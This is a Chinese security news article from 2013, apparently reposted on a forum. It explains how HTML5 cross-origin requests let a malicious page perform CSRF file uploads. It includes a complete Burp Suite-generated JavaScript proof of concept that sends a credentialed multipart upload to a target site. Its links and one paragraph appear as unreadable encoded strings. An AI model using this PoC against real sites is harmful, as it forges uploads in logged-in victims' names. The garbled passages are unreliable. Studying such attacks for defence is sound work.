新闻链接：a3dK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3k6J5k6h3g2T1N6h3k6Q4x3X3g2U0L8$3#2Q4x3V1k6S2M7Y4c8A6j5$3I4W2M7#2)9J5c8Y4N6W2j5W2)9J5c8U0p5%4z5o6f1@1i4K6u0W2K9s2c8E0L8l9`.`.
新闻时间：2013.11.20
新闻正文：
利用csrf漏洞上传文件
litdg @ WEB安全 2013-11-20 共 2412 人围观，发现 5 个不明物体 Favorite收藏该文
大家都知道通常用csrf来上传一个文件不是很简单的.问题在于我们创建的假的表单提交的数据跟浏览器文件上传提交的数据有一点不同.那就是上传的请求会有一个filename的参数:
-----------------------------256672629917035
Content-Disposition: form-data; name="file"; filename="test2.txt"
Content-Type: text/plain         
test3
-----------------------------256672629917035
如果我们创建一个表单，提交如上的请求是没法成功添加filename参数的，这是因为filename参数是文件上传的input自动生成。这就阻止了邪恶的黑客通过csrf上传文件。不过自从有了html5,一切都不一样了。
html5有一个新特性叫跨域资源共享(CORS
bf6K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4M7K6i4K6u0W2L8%4u0Y4i4K6u0r3g2q4u0Q4x3V1k6U0L8%4u0K6i4K6u0r3i4K6t1&6i4K6u0W2i4@1f1#2i4K6W2o6i4@1p5^5i4@1f1^5i4@1u0r3i4K6R3%4i4@1f1#2i4K6S2q4i4@1u0n7i4K6u0o6i4@1f1%4i4K6V1@1i4@1t1I4i4@1f1@1i4@1u0m8i4K6S2q4i4@1f1#2i4K6V1H3i4K6S2o6i4@1f1$3i4@1u0m8i4K6V1H3i4@1f1%4i4@1q4p5i4K6V1$3i4@1f1%4i4K6V1#2i4@1p5#2i4@1f1%4i4K6W2m8i4K6R3@1i4@1f1#2i4@1u0p5i4@1t1I4i4@1f1#2i4K6V1K6i4K6S2p5i4K6u0o6i4@1f1&6i4@1u0n7i4K6V1I4i4@1f1#2i4@1q4q4i4@1p5J5i4@1f1$3i4@1t1J5i4@1p5I4i4@1f1#2i4K6S2m8i4K6W2q4i4@1f1$3i4@1t1K6i4K6V1#2i4@1f1&6i4K6R3H3i4K6W2m8i4@1f1^5i4@1u0r3i4K6R3%4K9X3q4$3j5i4y4U0M7X3W2H3N6q4!0q4y4g2)9^5c8g2!0n7b7W2!0q4z5q4!0m8c8g2!0n7c8W2!0q4z5g2)9&6y4#2!0m8c8g2!0q4y4g2)9^5z5q4!0m8b7W2!0q4y4#2)9&6b7g2)9^5y4q4!0q4y4g2)9&6c8W2)9&6c8W2)9J5k6g2!0q4z5q4)9^5x3q4)9^5x3#2!0q4z5q4)9&6z5g2)9&6x3g2!0q4y4g2)9^5z5q4!0n7x3q4S2e0f1H3`.`.
这么泛滥,同源策略真的是让我们的生活更安全了.不过,利用html5的跨域资源共享,可以让javascript来发送有filename属性的合法的
跨域请求。这样只要用户访问了恶意页面，不需要其他的交互，就可以通过csrf来上传文件了。
下面是一个Burp Suite生成的poc：
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "256K9s2c8@1M7s2y4Q4x3@1q4Q4x3V1k6Q4x3V1k6W2P5r3q4E0M7r3I4W2i4K6u0W2j5$3!0E0i4K6u0r3L8X3g2%4i4K6g2X3k6X3W2D9k6g2)9J5k6h3S2@1L8h3H3`.", true);
        xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");
        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------256672629917035");
        xhr.withCredentials = "true";
        var body = "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"message\"\r\n" +
          "\r\n" +
          "\r\n" +
          "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"backPage\"\r\n" +
          "\r\n" +
          "test\r\n" +
          "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"dataType\"\r\n" +
          "\r\n" +
          "test  \r\n" +
          "-----------------------------256672629917035\r\n" +
          "Content-Disposition: form-data; name=\"file\"; filename=\"test2.txt\"\r\n" +
          "Content-Type: text/plain\r\n" +
          "\r\n" +
          "test3\r\n" +
          "-----------------------------256672629917035--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="submit" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>
当然，poc里的提交按钮不是必须的，可以通过javascript自动提交。从某种程度上来说浏览器的最重要的同源策略被突破了。这真是令人忧伤的一件事情。
扩展阅读：

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课